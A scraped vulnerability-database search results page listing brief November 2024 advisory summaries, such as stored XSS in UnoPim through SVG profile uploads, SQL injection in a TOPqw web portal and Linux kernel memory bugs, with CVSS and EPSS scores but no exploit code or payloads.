Lucene search
K

6045 matches found

NVD
NVD
added 2024/11/13 8:15 p.m.29 views

CVE-2024-42834

A stored cross-site scripting XSS vulnerability in the Create Customer API in Incognito Service Activation Center SAC UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter...

5.4CVSS0.00466EPSS
Exploits0References1
Snyk
Snyk
added 2024/11/13 6:37 p.m.2 views

Cross-site Scripting (XSS)

Overview Affected versions of this package are vulnerable to Cross-site Scripting XSS through the Create User process, which involves uploading a profile image. An attacker can exploit this by uploading a malicious SVG file containing a maliciously crafted script, which executes when the profile...

7.3CVSS5.3AI score0.0018EPSS
Exploits1References2
OSV
OSV
added 2024/11/13 6:37 p.m.10 views

GHSA-CGR4-C233-H733 UnoPim Stored XSS : Cookie hijacking through Create User function

Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...

7.3CVSS5.6AI score0.0018EPSS
Exploits1References4
Github Security Blog
Github Security Blog
added 2024/11/13 6:37 p.m.23 views

UnoPim Stored XSS : Cookie hijacking through Create User function

Summary A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an embedded script. When the profile image is accessed, the embedded script executes, leading to...

6.5CVSS6.3AI score0.0018EPSS
Exploits1References4Affected Software1
Vulnrichment
Vulnrichment
added 2024/11/13 3:20 p.m.10 views

CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function

UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

6.5CVSS6.7AI score0.0018EPSS
Exploits1References2
CVE
CVE
added 2024/11/13 3:20 p.m.66 views

CVE-2024-52305

CVE-2024-52305 affects UnoPim (Laravel). The issue resides in the Create User flow, where uploading a profile image (notably SVG) can execute embedded scripts, enabling a stored XSS that can steal cookies and potentially hijack sessions. Affected versions include the UnoPim releases prior to the ...

6.5CVSS5.5AI score0.0018EPSS
Exploits1References2Affected Software1
Cvelist
Cvelist
added 2024/11/13 3:20 p.m.32 views

CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function

UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

6.5CVSS0.0018EPSS
Exploits1References2
OSV
OSV
added 2024/11/13 3:20 p.m.21 views

CVE-2024-52305 UnoPim Stored XSS : Cookie hijacking through Create User function

UnoPim is an open-source Product Information Management PIM system built on the Laravel framework. A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

6.5CVSS6.6AI score0.0018EPSS
Exploits1References4
Cvelist
Cvelist
added 2024/11/13 12:0 a.m.16 views

CVE-2024-42834

A stored cross-site scripting XSS vulnerability in the Create Customer API in Incognito Service Activation Center SAC UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter...

0.00466EPSS
Exploits0References1
CNNVD
CNNVD
added 2024/11/13 12:0 a.m.3 views

baltic-it TOPqw Webportal 安全漏洞

baltic-it TOPqw Webportal is a web application developed by a social service provider of the German company baltic-it. It can be used to publicly view information about various facilities. A security vulnerability exists in baltic-it TOPqw Webportal version 1.35.287.1, which stems from a SQL...

5.4CVSS7.4AI score0.00315EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2024/11/13 12:0 a.m.17 views

CVE-2024-42834

A stored cross-site scripting XSS vulnerability in the Create Customer API in Incognito Service Activation Center SAC UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter...

5.6AI score0.00466EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2024/11/13 12:0 a.m.4 views

PT-2024-28833 · Cybele · Thinfinity Workspace

Name of the Vulnerable Software and Affected Versions: Cybele Software Thinfinity Workspace versions prior to 7.0.2.113 Description: The issue is related to an access control problem in the Create Profile section, allowing attackers to create arbitrary user profiles with elevated privileges. This...

7.3CVSS7.2AI score0.00271EPSS
Exploits0References6
Positive Technologies
Positive Technologies
added 2024/11/13 12:0 a.m.4 views

PT-2024-35166 · Unopim · Unopim

Name of the Vulnerable Software and Affected Versions: UnoPim versions prior to 0.1.5 Description: A vulnerability exists in the Create User process, allowing the creation of a new admin account with an option to upload a profile image. An attacker can upload a malicious SVG file containing an...

6.9CVSS7.2AI score0.0018EPSS
Exploits1References11
BDU FSTEC
BDU FSTEC
added 2024/11/13 12:0 a.m.3 views

The vulnerability of the Create MyConfig (CMC) utility in Siemens Sinumerik programmable logic controllers allows a perpetrator to circumvent security restrictions and gain unauthorized access to protected information.

The vulnerability of the Create MyConfig CMC utility in Siemens Sinumerik programmable logic controllers is related to the disclosure of information through registration files in the log files. Exploiting this vulnerability can allow attackers to circumvent security restrictions and gain...

5.5CVSS5.5AI score0.00155EPSS
Exploits0References3Affected Software1
Vulnrichment
Vulnrichment
added 2024/11/13 12:0 a.m.13 views

CVE-2024-40408

Cybele Software Thinfinity Workspace before v7.0.2.113 was discovered to contain an access control issue in the Create Profile section. This vulnerability allows attackers to create arbitrary user profiles with elevated privileges...

7.6AI score0.00271EPSS
Exploits0References1
CVE
CVE
added 2024/11/13 12:0 a.m.54 views

CVE-2024-45875

The CVE concerns baltic-it TOPqw Webportal 1.35.287.1, with a fix in 1.35.291. The vulnerability exists in the create user function at /Apps/TOPqw/BenutzerManagement.aspx/SaveNewUser, where the JSON object username enables SQL query manipulation. This is a SQL injection in the user-creation path,...

5.4CVSS7.8AI score0.00315EPSS
Exploits0References1
OSV
OSV
added 2024/11/12 5:15 p.m.2 views

CVE-2024-9842

Incorrect permissions in Ivanti Secure Access Client before version 22.7R4 allows a local authenticated attacker to create arbitrary folders...

3.3CVSS5.7AI score0.0021EPSS
Exploits0References1
RedHat Linux
RedHat Linux
added 2024/11/12 9:11 a.m.4 views

kernel: net/mlx5e: fix a double-free in arfs_create_groups

A double-free vulnerability was found in the arfscreategroups function in the Linux kernel's net/mlx5e driver. This issue could lead to memory corruption or a system crash if exploited, as freeing the same memory twice may cause undefined behavior...

5.3CVSS6.8AI score0.00861EPSS
Exploits0References5
SUSE CVE
SUSE CVE
added 2024/11/10 3:49 a.m.2 views

SUSE CVE-2024-50243

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix general protection fault in runismappedfull Fixed deleating of a non-resident attribute in ntfscreateinode rollback...

5.5CVSS7.7AI score0.00218EPSS
Exploits0References5
OSV
OSV
added 2024/11/09 11:15 a.m.1 views

DEBIAN-CVE-2024-50243

In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix general protection fault in runismappedfull Fixed deleating of a non-resident attribute in ntfscreateinode rollback...

5.5CVSS5.7AI score0.00218EPSS
Exploits0References1
Rows per page
Query Builder